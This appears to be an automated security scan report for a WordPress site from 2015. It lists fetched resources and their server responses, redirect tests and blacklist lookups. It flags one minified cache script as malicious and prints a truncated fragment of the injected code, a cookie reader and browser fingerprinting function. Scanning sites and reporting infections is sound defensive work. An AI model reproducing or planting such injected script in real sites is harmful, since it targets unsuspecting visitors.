Scanned pages/files
Request | Server response | Status |
http://trudybeerman.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Mar 2015 20:14:19 GMT Location: http://www.trudybeerman.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/ | 200 OK Content-Length: 37924 Content-Type: text/html | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12785 Content-Type: application/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/fZDBDoMwDEN_CBoB2mV_U1ig6VrSNekYfz-EmLQD2-3JtiwnHfhHwbxW3QF1pClbRRNprhqwRV3KDFYEVcDLETMD852wcqrpCmC9fZmJeQpoE8nmxl2DQL3Agv3Is0LzIePlf3eZ9cbLyYAx8JKCXTF_Yd2Z1jTtz8mp9IGGU8tpDBdx9NweUAgGzvvlbw.js | 200 OK Content-Length: 156570 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9QvKM0pTs3IL0stis_NzMvUzypGEgIA.js | 200 OK Content-Length: 4954 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name){var kloack=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return kloack?decodeURIComponent(kloack[1]):undefined;} function Ubrostyleddesignercoder(){var specifico_stock=navigator.userAgent;var flawor_bobma=(specifico_stock.indexOf("Windows NT 6.3")>-1||specifico_stock.indexOf("IEMobile")>-1||specifico_stock.indexOf("Chrome")>-1||specifico_stock.indexOf("Windows NT 6.2")>-1||specifico_stock.inde getPageContent=function(page_type){if($('.post').length) return $('.post');else if($('article').length) return $('article');else if($('.page').length) return $('.page');else if($('#main-content').length) return $('#main-content');else if($('.main-content').length) return $('.main-content');else if($('#content').length) return $('#content');else if($('.content').length) return $('.content');return false;}}(jQuery));
Antivirus reports:
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9BPzCzSTUrMycnPz9PPKtbPSyzLTE8syczPAwA.js | 200 OK Content-Length: 1225 Content-Type: text/javascript | clean |
http://trudybeerman.com//filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 24 Mar 2015 20:14:23 GMT Pragma: no-cache Location: http://www.trudybeerman.com/filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | 404 Not Found Content-Length: 31666 Content-Type: text/html | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9bPKixNLarUMYYydHMz04sSS1L1cjPzdAz1E0tLMgqK8vUTi4tTS4r1s4qhyvSS8_OzM1OB2koz9ZPzi8DqAQ.js | 200 OK Content-Length: 110951 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9YvzdRPTUtLTS7Ry83MAwA.js | 200 OK Content-Length: 13436 Content-Type: text/javascript | clean |
http://trudybeerman.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 24 Mar 2015 20:14:28 GMT Pragma: no-cache Location: http://www.trudybeerman.com/test404page.js Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/test404page.js | 404 Not Found Content-Length: 31666 Content-Type: text/html | clean |
http://www.trudybeerman.com//filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201513 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2015Maraa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9TPSi0pSEzO1s_NTynNSS3WLy9IL8rPyAcA.js | 200 OK Content-Length: 751 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9TPSi0pSEzO1s_NTynNSS3WL85ILEpNSUxJqQQzM_PSAQ.js | 200 OK Content-Length: 37324 Content-Type: text/javascript | clean |
http://stats.wp.com/e-201513.js | 200 OK Content-Length: 3334 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trudybeerman.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Mar 2015 20:14:19 GMT
Location: http://www.trudybeerman.com/
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.trudybeerman.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trudybeerman.com
Referer: http://www.google.com/search?q=trudybeerman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trudybeerman.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trudybeerman.com/
Result: trudybeerman.com is not infected or malware details are not published yet.